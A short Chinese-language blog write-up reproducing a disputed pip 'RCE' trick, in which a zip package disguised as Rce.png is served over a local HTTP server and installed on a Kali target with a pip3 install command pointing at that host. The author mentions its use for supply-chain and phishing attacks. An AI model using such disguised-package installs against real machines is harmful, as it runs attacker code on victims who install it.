其实说实话,这个洞是有争议的,不过竟然有效果,那咱们就复现一波。
首先脚本地址是在github的
地址: https://github.com/52piaoyu/linux-pip-rce
下载之后是主机文件其实是Rce.png,而后将格式更改成zip文件,可以看到其实文件的主体就是如下的
很简单很明了,干干净净~
好了,步入正题。
我们本地复现,本地利用python3环境开始临时的http环境
python -m http.server
而后靶机环境是kali哈
pip3 install "http://192"."168"."xx"."xxx:8000/Rce.png"
就这样,就可以了,点到即止
怎么说呢,可以,但是没必要,因为这个洞只能本地利用,其次就是用于供应链、社工钓鱼还行,但是我想这个Poc…应该也许可能没人点吧。。。